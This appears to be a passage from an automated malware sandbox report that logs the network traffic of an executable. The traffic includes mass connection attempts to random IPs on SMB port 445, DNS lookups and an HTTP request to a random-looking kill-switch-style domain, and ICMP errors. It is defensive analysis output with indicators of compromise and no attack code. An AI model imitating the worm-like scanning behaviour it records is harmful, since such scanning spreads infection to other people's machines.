              Oct 10, 2022 17:18:07.932118893 CEST44553183172.65.204.24192.168.2.5
              Oct 10, 2022 17:18:07.932182074 CEST53183445192.168.2.5172.65.204.24
              Oct 10, 2022 17:18:07.932234049 CEST53183445192.168.2.5172.65.204.24
              Oct 10, 2022 17:18:07.932250977 CEST44553182172.65.204.24192.168.2.5
              Oct 10, 2022 17:18:07.949166059 CEST44553183172.65.204.24192.168.2.5
              Oct 10, 2022 17:18:07.950387955 CEST44553183172.65.204.24192.168.2.5
              Oct 10, 2022 17:18:08.029506922 CEST44553159173.44.216.3192.168.2.5
              Oct 10, 2022 17:18:08.558669090 CEST53159445192.168.2.5173.44.216.3
              Oct 10, 2022 17:18:08.700052977 CEST44553159173.44.216.3192.168.2.5
              Oct 10, 2022 17:18:08.918793917 CEST53191445192.168.2.5182.52.99.77
              Oct 10, 2022 17:18:08.919197083 CEST53192445192.168.2.594.140.204.184
              Oct 10, 2022 17:18:08.919470072 CEST53193445192.168.2.544.136.226.150
              Oct 10, 2022 17:18:08.919846058 CEST53194445192.168.2.586.2.75.106
              Oct 10, 2022 17:18:08.920202971 CEST53196445192.168.2.5179.88.92.10
              Oct 10, 2022 17:18:08.920320034 CEST53197445192.168.2.545.55.110.122
              Oct 10, 2022 17:18:08.920444012 CEST53198445192.168.2.559.145.114.227
              Oct 10, 2022 17:18:09.027348042 CEST44349693131.253.33.200192.168.2.5
              Oct 10, 2022 17:18:09.094536066 CEST4455319745.55.110.122192.168.2.5
              Oct 10, 2022 17:18:09.271954060 CEST53200445192.168.2.5188.36.141.136
              Oct 10, 2022 17:18:09.272219896 CEST53202445192.168.2.568.216.185.184
              Oct 10, 2022 17:18:09.272605896 CEST53203445192.168.2.580.146.203.222
              Oct 10, 2022 17:18:09.272778988 CEST53205445192.168.2.588.63.182.24
              Oct 10, 2022 17:18:09.272898912 CEST53206445192.168.2.5168.32.225.140
              Oct 10, 2022 17:18:09.272994995 CEST53207445192.168.2.5217.32.169.155
              Oct 10, 2022 17:18:09.273274899 CEST53211445192.168.2.5218.165.218.117
              Oct 10, 2022 17:18:09.273353100 CEST53212445192.168.2.51.165.94.130
              Oct 10, 2022 17:18:09.273514986 CEST53213445192.168.2.5137.204.5.156
              Oct 10, 2022 17:18:09.273597002 CEST53214445192.168.2.5191.136.164.141
              Oct 10, 2022 17:18:09.273809910 CEST53216445192.168.2.580.83.154.162
              Oct 10, 2022 17:18:09.274032116 CEST53219445192.168.2.5195.79.237.56
              Oct 10, 2022 17:18:09.274106026 CEST53220445192.168.2.5151.242.149.178
              Oct 10, 2022 17:18:09.274218082 CEST53221445192.168.2.597.251.60.12
              Oct 10, 2022 17:18:09.274293900 CEST53222445192.168.2.5212.45.107.221
              Oct 10, 2022 17:18:09.274591923 CEST53225445192.168.2.53.17.6.154
              Oct 10, 2022 17:18:09.274703026 CEST53226445192.168.2.551.54.101.65
              Oct 10, 2022 17:18:09.274863958 CEST53227445192.168.2.5174.117.20.17
              Oct 10, 2022 17:18:09.275012016 CEST53228445192.168.2.5173.229.119.141
              Oct 10, 2022 17:18:09.275202036 CEST53229445192.168.2.571.224.222.131
              Oct 10, 2022 17:18:09.275477886 CEST53231445192.168.2.537.169.0.242
              Oct 10, 2022 17:18:09.275572062 CEST53232445192.168.2.534.233.29.144
              Oct 10, 2022 17:18:09.275652885 CEST53233445192.168.2.557.100.224.33
              Oct 10, 2022 17:18:09.276551008 CEST53243445192.168.2.5125.106.242.210
              Oct 10, 2022 17:18:09.419527054 CEST44553206168.32.225.140192.168.2.5
              Oct 10, 2022 17:18:09.715039968 CEST53197445192.168.2.545.55.110.122
              Oct 10, 2022 17:18:09.888880014 CEST4455319745.55.110.122192.168.2.5
              Oct 10, 2022 17:18:09.933779955 CEST53206445192.168.2.5168.32.225.140
              Oct 10, 2022 17:18:10.043688059 CEST53251445192.168.2.569.142.210.132
              Oct 10, 2022 17:18:10.043746948 CEST53252445192.168.2.5204.215.216.234
              Oct 10, 2022 17:18:10.043931007 CEST53253445192.168.2.541.112.245.13
              Oct 10, 2022 17:18:10.044006109 CEST53254445192.168.2.551.238.222.217
              Oct 10, 2022 17:18:10.044271946 CEST53257445192.168.2.549.192.161.61
              Oct 10, 2022 17:18:10.044430017 CEST53258445192.168.2.5141.132.140.179
              Oct 10, 2022 17:18:10.044430017 CEST53256445192.168.2.543.108.44.110
              Oct 10, 2022 17:18:10.080665112 CEST44553206168.32.225.140192.168.2.5
              Oct 10, 2022 17:18:10.387609005 CEST53260445192.168.2.5214.248.192.40
              Oct 10, 2022 17:18:10.387749910 CEST53261445192.168.2.560.126.98.41
              Oct 10, 2022 17:18:10.387903929 CEST53263445192.168.2.5200.115.113.223
              Oct 10, 2022 17:18:10.388061047 CEST53265445192.168.2.5212.58.206.196
              Oct 10, 2022 17:18:10.388223886 CEST53266445192.168.2.595.245.169.59
              Oct 10, 2022 17:18:10.388375998 CEST53267445192.168.2.5178.81.243.129
              Oct 10, 2022 17:18:10.388710022 CEST53272445192.168.2.58.99.14.19
              Oct 10, 2022 17:18:10.388735056 CEST53271445192.168.2.5204.66.224.47
              Oct 10, 2022 17:18:10.388848066 CEST53273445192.168.2.5190.126.28.134
              Oct 10, 2022 17:18:10.388971090 CEST53274445192.168.2.5141.192.45.246
              Oct 10, 2022 17:18:10.389153957 CEST53276445192.168.2.548.209.222.219
              Oct 10, 2022 17:18:10.389360905 CEST53279445192.168.2.590.133.249.251
              Oct 10, 2022 17:18:10.389497995 CEST53281445192.168.2.5194.119.74.241
              Oct 10, 2022 17:18:10.389527082 CEST53280445192.168.2.5126.38.120.152
              Oct 10, 2022 17:18:10.389736891 CEST53283445192.168.2.5151.119.142.211
              Oct 10, 2022 17:18:10.389910936 CEST53285445192.168.2.5197.248.226.59
              Oct 10, 2022 17:18:10.390099049 CEST53286445192.168.2.5191.199.221.71
              Oct 10, 2022 17:18:10.390101910 CEST53287445192.168.2.57.70.64.10
              Oct 10, 2022 17:18:10.390285015 CEST53288445192.168.2.5160.170.111.70
              Oct 10, 2022 17:18:10.390414953 CEST53289445192.168.2.5141.65.93.10
              Oct 10, 2022 17:18:10.390516996 CEST53291445192.168.2.584.115.229.155
              Oct 10, 2022 17:18:10.390656948 CEST53292445192.168.2.572.141.155.213
              Oct 10, 2022 17:18:10.390674114 CEST53293445192.168.2.5122.105.243.195
              Oct 10, 2022 17:18:10.391554117 CEST53303445192.168.2.5144.1.28.32
              Oct 10, 2022 17:18:10.460499048 CEST4455326695.245.169.59192.168.2.5
              Oct 10, 2022 17:18:10.679841042 CEST4455326160.126.98.41192.168.2.5
              Oct 10, 2022 17:18:10.964355946 CEST53266445192.168.2.595.245.169.59
              Oct 10, 2022 17:18:10.965634108 CEST53310445192.168.2.5172.65.204.24
              Oct 10, 2022 17:18:10.978811026 CEST44553286191.199.221.71192.168.2.5
              Oct 10, 2022 17:18:10.982644081 CEST44553310172.65.204.24192.168.2.5
              Oct 10, 2022 17:18:10.983149052 CEST53310445192.168.2.5172.65.204.24
              Oct 10, 2022 17:18:10.983149052 CEST53310445192.168.2.5172.65.204.24
              Oct 10, 2022 17:18:11.000195026 CEST44553310172.65.204.24192.168.2.5
              Oct 10, 2022 17:18:11.000930071 CEST44553310172.65.204.24192.168.2.5
              Oct 10, 2022 17:18:11.037755966 CEST4455326695.245.169.59192.168.2.5
              Oct 10, 2022 17:18:11.060240030 CEST53313445192.168.2.5172.65.204.25
              Oct 10, 2022 17:18:11.077389956 CEST44553313172.65.204.25192.168.2.5
              Oct 10, 2022 17:18:11.077864885 CEST53313445192.168.2.5172.65.204.25
              Oct 10, 2022 17:18:11.077935934 CEST53313445192.168.2.5172.65.204.25
              Oct 10, 2022 17:18:11.078408003 CEST53314445192.168.2.5172.65.204.25
              Oct 10, 2022 17:18:11.095252037 CEST44553314172.65.204.25192.168.2.5
              Oct 10, 2022 17:18:11.095478058 CEST44553313172.65.204.25192.168.2.5
              Oct 10, 2022 17:18:11.095603943 CEST53314445192.168.2.5172.65.204.25
              Oct 10, 2022 17:18:11.095644951 CEST53314445192.168.2.5172.65.204.25
              Oct 10, 2022 17:18:11.096746922 CEST44553313172.65.204.25192.168.2.5
              Oct 10, 2022 17:18:11.112493038 CEST44553314172.65.204.25192.168.2.5
              Oct 10, 2022 17:18:11.113723040 CEST44553314172.65.204.25192.168.2.5
              Oct 10, 2022 17:18:11.168745041 CEST53315445192.168.2.5125.149.201.234
              Oct 10, 2022 17:18:11.168745041 CEST53316445192.168.2.5199.24.160.222
              Oct 10, 2022 17:18:11.168966055 CEST53318445192.168.2.586.111.239.87
              Oct 10, 2022 17:18:11.169059992 CEST53317445192.168.2.5113.77.240.38
              Oct 10, 2022 17:18:11.169059992 CEST53319445192.168.2.5138.189.182.192
              Oct 10, 2022 17:18:11.169064999 CEST53321445192.168.2.561.127.140.14
              Oct 10, 2022 17:18:11.169681072 CEST53322445192.168.2.5178.16.51.94
              Oct 10, 2022 17:18:11.216448069 CEST53261445192.168.2.560.126.98.41
              Oct 10, 2022 17:18:11.508538008 CEST4455326160.126.98.41192.168.2.5
              Oct 10, 2022 17:18:11.512497902 CEST53324445192.168.2.5214.189.133.111
              Oct 10, 2022 17:18:11.512767076 CEST53325445192.168.2.544.77.97.35
              Oct 10, 2022 17:18:11.512774944 CEST53327445192.168.2.5149.30.218.36
              Oct 10, 2022 17:18:11.513096094 CEST53329445192.168.2.52.103.230.71
              Oct 10, 2022 17:18:11.513106108 CEST53331445192.168.2.5116.18.209.14
              Oct 10, 2022 17:18:11.513437986 CEST53334445192.168.2.529.170.141.109
              Oct 10, 2022 17:18:11.513694048 CEST53336445192.168.2.540.113.107.58
              Oct 10, 2022 17:18:11.513928890 CEST53339445192.168.2.5163.138.47.179
              Oct 10, 2022 17:18:11.513946056 CEST53340445192.168.2.5170.75.250.13
              Oct 10, 2022 17:18:11.514147997 CEST53343445192.168.2.5214.120.30.174
              Oct 10, 2022 17:18:11.514157057 CEST53341445192.168.2.587.110.224.140
              Oct 10, 2022 17:18:11.514332056 CEST53337445192.168.2.5145.219.91.80
              Oct 10, 2022 17:18:11.514332056 CEST53345445192.168.2.5178.47.19.136
              Oct 10, 2022 17:18:11.514336109 CEST53344445192.168.2.554.231.83.46
              Oct 10, 2022 17:18:11.514484882 CEST53349445192.168.2.5198.57.252.141
              Oct 10, 2022 17:18:11.514487982 CEST53348445192.168.2.5116.123.149.82
              Oct 10, 2022 17:18:11.514576912 CEST53351445192.168.2.512.249.223.247
              Oct 10, 2022 17:18:11.514581919 CEST53350445192.168.2.520.185.10.12
              Oct 10, 2022 17:18:11.514695883 CEST53332445192.168.2.55.146.219.230
              Oct 10, 2022 17:18:11.514695883 CEST53353445192.168.2.5208.47.122.77
              Oct 10, 2022 17:18:11.514695883 CEST53354445192.168.2.5139.189.47.152
              Oct 10, 2022 17:18:11.514790058 CEST53356445192.168.2.532.169.62.230
              Oct 10, 2022 17:18:11.514924049 CEST53355445192.168.2.5145.28.226.249
              Oct 10, 2022 17:18:11.515526056 CEST53366445192.168.2.5195.227.168.245
              Oct 10, 2022 17:18:12.293853998 CEST53376445192.168.2.574.43.192.161
              Oct 10, 2022 17:18:12.293884993 CEST53379445192.168.2.5134.145.173.249
              Oct 10, 2022 17:18:12.293889046 CEST53377445192.168.2.5160.163.84.195
              Oct 10, 2022 17:18:12.293888092 CEST53378445192.168.2.555.86.82.69
              Oct 10, 2022 17:18:12.293998957 CEST53381445192.168.2.5136.13.62.131
              Oct 10, 2022 17:18:12.294014931 CEST53380445192.168.2.532.99.129.117
              Oct 10, 2022 17:18:12.294123888 CEST53383445192.168.2.5112.43.8.88
              Oct 10, 2022 17:18:12.637557030 CEST53386445192.168.2.5145.38.242.161
              Oct 10, 2022 17:18:12.637618065 CEST53387445192.168.2.5216.124.0.176
              Oct 10, 2022 17:18:12.637722969 CEST53388445192.168.2.5117.151.248.195
              Oct 10, 2022 17:18:12.637811899 CEST53390445192.168.2.550.92.150.73
              Oct 10, 2022 17:18:12.637906075 CEST53392445192.168.2.557.230.74.220
              Oct 10, 2022 17:18:12.638068914 CEST53394445192.168.2.557.18.223.247
              Oct 10, 2022 17:18:12.638071060 CEST53395445192.168.2.5116.201.231.119
              Oct 10, 2022 17:18:12.638189077 CEST53397445192.168.2.5159.207.254.84
              Oct 10, 2022 17:18:12.638268948 CEST53398445192.168.2.5100.220.253.144
              Oct 10, 2022 17:18:12.638322115 CEST53399445192.168.2.546.75.6.195
              Oct 10, 2022 17:18:12.638427019 CEST53400445192.168.2.5165.110.237.193
              Oct 10, 2022 17:18:12.638463974 CEST53402445192.168.2.5142.201.167.72
              Oct 10, 2022 17:18:12.638577938 CEST53404445192.168.2.584.12.237.47
              Oct 10, 2022 17:18:12.638679028 CEST53406445192.168.2.5180.42.45.201
              Oct 10, 2022 17:18:12.638746977 CEST53408445192.168.2.5119.217.16.90
              Oct 10, 2022 17:18:12.638792992 CEST53407445192.168.2.588.236.63.143
              Oct 10, 2022 17:18:12.638919115 CEST53410445192.168.2.5147.247.69.203
              Oct 10, 2022 17:18:12.638968945 CEST53411445192.168.2.5188.91.216.244
              Oct 10, 2022 17:18:12.638997078 CEST53412445192.168.2.5219.7.40.229
              Oct 10, 2022 17:18:12.639131069 CEST53414445192.168.2.5183.127.230.203
              Oct 10, 2022 17:18:12.639188051 CEST53415445192.168.2.523.62.10.154
              Oct 10, 2022 17:18:12.639235020 CEST53416445192.168.2.597.10.237.136
              Oct 10, 2022 17:18:12.639329910 CEST53418445192.168.2.5169.142.17.155
              Oct 10, 2022 17:18:12.639750957 CEST53428445192.168.2.5112.28.10.199
              Oct 10, 2022 17:18:13.419101000 CEST53439445192.168.2.5201.73.207.178
              Oct 10, 2022 17:18:13.419112921 CEST53438445192.168.2.587.171.224.226
              Oct 10, 2022 17:18:13.419308901 CEST53441445192.168.2.5133.137.108.57
              Oct 10, 2022 17:18:13.419316053 CEST53440445192.168.2.5125.151.150.178
              Oct 10, 2022 17:18:13.419424057 CEST53442445192.168.2.560.182.190.74
              Oct 10, 2022 17:18:13.419435978 CEST53443445192.168.2.570.37.91.46
              Oct 10, 2022 17:18:13.419523001 CEST53445445192.168.2.577.162.42.251
              Oct 10, 2022 17:18:13.747524977 CEST53448445192.168.2.576.241.167.85
              Oct 10, 2022 17:18:13.747807026 CEST53449445192.168.2.5140.168.237.149
              Oct 10, 2022 17:18:13.747910023 CEST53450445192.168.2.5167.3.218.133
              Oct 10, 2022 17:18:13.748207092 CEST53451445192.168.2.551.196.117.82
              Oct 10, 2022 17:18:13.748450994 CEST53454445192.168.2.5204.5.80.6
              Oct 10, 2022 17:18:13.748769999 CEST53456445192.168.2.5116.115.61.245
              Oct 10, 2022 17:18:13.748876095 CEST53457445192.168.2.581.225.114.195
              Oct 10, 2022 17:18:13.749181032 CEST53459445192.168.2.5153.122.124.205
              Oct 10, 2022 17:18:13.749445915 CEST53460445192.168.2.5183.98.26.234
              Oct 10, 2022 17:18:13.749500990 CEST53461445192.168.2.521.238.125.223
              Oct 10, 2022 17:18:13.749716043 CEST53462445192.168.2.524.252.70.2
              Oct 10, 2022 17:18:13.750111103 CEST53464445192.168.2.572.173.196.101
              Oct 10, 2022 17:18:13.750365019 CEST53466445192.168.2.528.19.36.82
              Oct 10, 2022 17:18:13.750724077 CEST53469445192.168.2.57.248.235.105
              Oct 10, 2022 17:18:13.750735044 CEST53468445192.168.2.567.204.80.117
              Oct 10, 2022 17:18:13.751132011 CEST53471445192.168.2.5145.41.151.55
              Oct 10, 2022 17:18:13.751252890 CEST53472445192.168.2.5219.244.191.56
              Oct 10, 2022 17:18:13.751504898 CEST53473445192.168.2.549.171.152.128
              Oct 10, 2022 17:18:13.751540899 CEST53474445192.168.2.5169.4.82.25
              Oct 10, 2022 17:18:13.752048969 CEST53477445192.168.2.513.126.38.47
              Oct 10, 2022 17:18:13.752253056 CEST53475445192.168.2.589.247.68.44
              Oct 10, 2022 17:18:13.752253056 CEST53478445192.168.2.5149.215.213.205
              Oct 10, 2022 17:18:13.752731085 CEST53480445192.168.2.586.182.84.228
              Oct 10, 2022 17:18:13.753626108 CEST53490445192.168.2.516.119.92.194
              Oct 10, 2022 17:18:14.122183084 CEST53497445192.168.2.5172.65.204.25
              Oct 10, 2022 17:18:14.139364958 CEST44553497172.65.204.25192.168.2.5
              Oct 10, 2022 17:18:14.139482975 CEST53497445192.168.2.5172.65.204.25
              Oct 10, 2022 17:18:14.139790058 CEST53497445192.168.2.5172.65.204.25
              Oct 10, 2022 17:18:14.156676054 CEST44553497172.65.204.25192.168.2.5
              Oct 10, 2022 17:18:14.157260895 CEST44553497172.65.204.25192.168.2.5
              Oct 10, 2022 17:18:14.216289997 CEST53499445192.168.2.5172.65.204.26
              Oct 10, 2022 17:18:14.233321905 CEST44553499172.65.204.26192.168.2.5
              Oct 10, 2022 17:18:14.233556986 CEST53499445192.168.2.5172.65.204.26
              Oct 10, 2022 17:18:14.233614922 CEST53499445192.168.2.5172.65.204.26
              Oct 10, 2022 17:18:14.234344959 CEST53500445192.168.2.5172.65.204.26
              Oct 10, 2022 17:18:14.250648022 CEST44553499172.65.204.26192.168.2.5
              Oct 10, 2022 17:18:14.251321077 CEST44553500172.65.204.26192.168.2.5
              Oct 10, 2022 17:18:14.251375914 CEST44553499172.65.204.26192.168.2.5
              Oct 10, 2022 17:18:14.251601934 CEST53500445192.168.2.5172.65.204.26
              Oct 10, 2022 17:18:14.251601934 CEST53500445192.168.2.5172.65.204.26
              Oct 10, 2022 17:18:14.268810034 CEST44553500172.65.204.26192.168.2.5
              Oct 10, 2022 17:18:14.271049976 CEST44553500172.65.204.26192.168.2.5
              Oct 10, 2022 17:18:16.434317112 CEST53442445192.168.2.560.182.190.74
              Oct 10, 2022 17:18:16.435054064 CEST53441445192.168.2.5133.137.108.57
              Oct 10, 2022 17:18:16.435058117 CEST53438445192.168.2.587.171.224.226
              Oct 10, 2022 17:18:16.435079098 CEST53445445192.168.2.577.162.42.251
              Oct 10, 2022 17:18:16.435079098 CEST53439445192.168.2.5201.73.207.178
              Oct 10, 2022 17:18:16.435312033 CEST53440445192.168.2.5125.151.150.178
              Oct 10, 2022 17:18:16.435362101 CEST53443445192.168.2.570.37.91.46
              Oct 10, 2022 17:18:16.746951103 CEST53448445192.168.2.576.241.167.85
              Oct 10, 2022 17:18:16.746974945 CEST53459445192.168.2.5153.122.124.205
              Oct 10, 2022 17:18:16.746995926 CEST53450445192.168.2.5167.3.218.133
              Oct 10, 2022 17:18:16.746995926 CEST53454445192.168.2.5204.5.80.6
              Oct 10, 2022 17:18:16.747005939 CEST53457445192.168.2.581.225.114.195
              Oct 10, 2022 17:18:16.747004032 CEST53471445192.168.2.5145.41.151.55
              Oct 10, 2022 17:18:16.747009993 CEST53464445192.168.2.572.173.196.101
              Oct 10, 2022 17:18:16.747018099 CEST53474445192.168.2.5169.4.82.25
              Oct 10, 2022 17:18:16.747029066 CEST53466445192.168.2.528.19.36.82
              Oct 10, 2022 17:18:16.747033119 CEST53490445192.168.2.516.119.92.194
              Oct 10, 2022 17:18:16.747045040 CEST53456445192.168.2.5116.115.61.245
              Oct 10, 2022 17:18:16.747045040 CEST53478445192.168.2.5149.215.213.205
              Oct 10, 2022 17:18:16.747045040 CEST53475445192.168.2.589.247.68.44
              Oct 10, 2022 17:18:16.762530088 CEST53451445192.168.2.551.196.117.82
              Oct 10, 2022 17:18:16.762547016 CEST53462445192.168.2.524.252.70.2
              Oct 10, 2022 17:18:16.762559891 CEST53460445192.168.2.5183.98.26.234
              Oct 10, 2022 17:18:16.762567043 CEST53472445192.168.2.5219.244.191.56
              Oct 10, 2022 17:18:16.762567997 CEST53473445192.168.2.549.171.152.128
              Oct 10, 2022 17:18:16.762573957 CEST53477445192.168.2.513.126.38.47
              Oct 10, 2022 17:18:16.762592077 CEST53469445192.168.2.57.248.235.105
              Oct 10, 2022 17:18:16.762598991 CEST53461445192.168.2.521.238.125.223
              Oct 10, 2022 17:18:16.762599945 CEST53449445192.168.2.5140.168.237.149
              Oct 10, 2022 17:18:16.762646914 CEST53480445192.168.2.586.182.84.228
              Oct 10, 2022 17:18:16.762833118 CEST53468445192.168.2.567.204.80.117

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 10, 2022 17:16:04.811422110 CEST5029553192.168.2.58.8.8.8
              Oct 10, 2022 17:16:04.832926989 CEST53502958.8.8.8192.168.2.5
              Oct 10, 2022 17:16:06.050132990 CEST6084153192.168.2.58.8.8.8
              Oct 10, 2022 17:16:06.071432114 CEST53608418.8.8.8192.168.2.5
              Oct 10, 2022 17:16:55.361758947 CEST138138192.168.2.5192.168.2.255

              ICMP Packets

              TimestampSource IPDest IPChecksumCodeType
              Oct 10, 2022 17:16:16.328723907 CEST41.222.197.9192.168.2.52579(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:16:24.300817013 CEST149.11.89.129192.168.2.5240f(Net unreachable)Destination Unreachable
              Oct 10, 2022 17:16:28.972906113 CEST69.194.42.2192.168.2.5efd3(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:16:32.361608982 CEST50.236.161.82192.168.2.5943c(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:16:33.293627024 CEST87.122.67.78192.168.2.5bffa(Unknown)Destination Unreachable
              Oct 10, 2022 17:16:39.709712982 CEST95.209.204.253192.168.2.5916c(Net unreachable)Destination Unreachable
              Oct 10, 2022 17:16:48.792913914 CEST62.129.251.191192.168.2.53647(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:16:49.639338017 CEST202.94.141.10192.168.2.5d669(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:16:49.786591053 CEST37.138.120.154192.168.2.5a256(Unknown)Destination Unreachable
              Oct 10, 2022 17:16:51.013014078 CEST184.105.249.170192.168.2.5475a(Unknown)Destination Unreachable
              Oct 10, 2022 17:16:51.989120960 CEST88.133.238.22192.168.2.5542a(Unknown)Destination Unreachable
              Oct 10, 2022 17:16:55.678961039 CEST129.80.210.99192.168.2.5137b(Unknown)Destination Unreachable
              Oct 10, 2022 17:16:57.746572018 CEST78.35.170.2192.168.2.5e00e(Unknown)Destination Unreachable
              Oct 10, 2022 17:16:59.027010918 CEST122.187.203.229192.168.2.535be(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:00.723500013 CEST144.232.207.226192.168.2.5dd92(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:03.254031897 CEST5.56.18.166192.168.2.51756(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:04.381781101 CEST62.252.244.38192.168.2.5ce7f(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:04.537591934 CEST102.220.216.37192.168.2.51508(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:09.656327009 CEST61.112.67.250192.168.2.54bf6(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:10.313105106 CEST202.224.52.160192.168.2.57440(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:11.092780113 CEST176.31.148.229192.168.2.54cf(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:11.342278957 CEST216.73.79.74192.168.2.5c195(Net unreachable)Destination Unreachable
              Oct 10, 2022 17:17:13.256257057 CEST95.208.80.34192.168.2.53296(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:14.520973921 CEST217.236.185.173192.168.2.5a319(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:15.485469103 CEST84.171.122.66192.168.2.582fc(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:16.755697012 CEST23.188.16.37192.168.2.5c02c(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:19.021269083 CEST65.124.244.105192.168.2.5e50e(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:19.035044909 CEST168.187.0.39192.168.2.515c9(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:20.056741953 CEST196.61.40.57192.168.2.55476(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:20.142349005 CEST47.200.165.201192.168.2.59558(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:20.189918995 CEST209.148.237.130192.168.2.519e2(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:20.281632900 CEST10.0.253.2192.168.2.559b1(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:21.327728033 CEST96.1.218.37192.168.2.51ff6(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:21.956727028 CEST193.238.77.67192.168.2.51caf(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:23.082868099 CEST85.195.111.51192.168.2.5c328(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:25.528393984 CEST147.87.210.61192.168.2.56381(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:29.898526907 CEST162.144.240.19192.168.2.54a73(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:33.105103016 CEST12.118.72.34192.168.2.5d49b(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:34.078198910 CEST88.64.175.207192.168.2.53c0f(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:34.219389915 CEST45.38.45.131192.168.2.51a73(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:34.233603954 CEST154.73.32.1192.168.2.57bd9(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:35.156888962 CEST149.224.230.169192.168.2.5e15f(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:36.419361115 CEST104.140.167.245192.168.2.5d04b(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:37.501357079 CEST192.227.166.35192.168.2.526d1(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:39.832663059 CEST41.208.48.126192.168.2.59947(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:42.032618999 CEST200.19.156.137192.168.2.5d0ff(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:44.112597942 CEST84.144.174.107192.168.2.53932(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:44.933258057 CEST185.100.83.253192.168.2.567af(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:45.223396063 CEST151.156.252.4192.168.2.53224(Net unreachable)Destination Unreachable
              Oct 10, 2022 17:17:52.870302916 CEST149.11.89.129192.168.2.5a0c4(Net unreachable)Destination Unreachable
              Oct 10, 2022 17:17:52.983858109 CEST86.95.208.117192.168.2.5a34b(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:53.772459030 CEST199.250.176.35192.168.2.536f4(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:54.018225908 CEST79.226.139.188192.168.2.5a009(Unknown)Destination Unreachable
              Oct 10, 2022 17:17:55.249015093 CEST136.56.160.200192.168.2.5e8d1(Port unreachable)Destination Unreachable
              Oct 10, 2022 17:17:58.631576061 CEST66.115.166.216192.168.2.5e0c1(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:17:59.646699905 CEST37.44.224.13192.168.2.5e258(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:17:59.793169975 CEST10.0.32.118192.168.2.53020(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:18:08.565598011 CEST58.159.228.82192.168.2.563e0(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:18:10.640444994 CEST200.115.113.0192.168.2.5f226(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:18:11.222867012 CEST83.125.8.3192.168.2.51289(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:18:13.907008886 CEST4.68.39.149192.168.2.51c44(Time to live exceeded in transit)Time Exceeded
              Oct 10, 2022 17:18:14.680510998 CEST162.144.240.39192.168.2.5829a(Host unreachable)Destination Unreachable
              Oct 10, 2022 17:18:16.916785955 CEST4.68.39.149192.168.2.51c44(Time to live exceeded in transit)Time Exceeded

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 10, 2022 17:16:04.811422110 CEST192.168.2.58.8.8.80x21c6Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)false
              Oct 10, 2022 17:16:06.050132990 CEST192.168.2.58.8.8.80x1ef0Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 10, 2022 17:16:04.832926989 CEST8.8.8.8192.168.2.50x21c6No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)false
              Oct 10, 2022 17:16:04.832926989 CEST8.8.8.8192.168.2.50x21c6No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)false
              Oct 10, 2022 17:16:06.071432114 CEST8.8.8.8192.168.2.50x1ef0No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)false
              Oct 10, 2022 17:16:06.071432114 CEST8.8.8.8192.168.2.50x1ef0No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.549698104.16.173.8080C:\Users\user\Desktop\e0R5qxY8Vj.exe
              TimestampkBytes transferredDirectionData
              Oct 10, 2022 17:16:04.949392080 CEST91OUTGET / HTTP/1.1
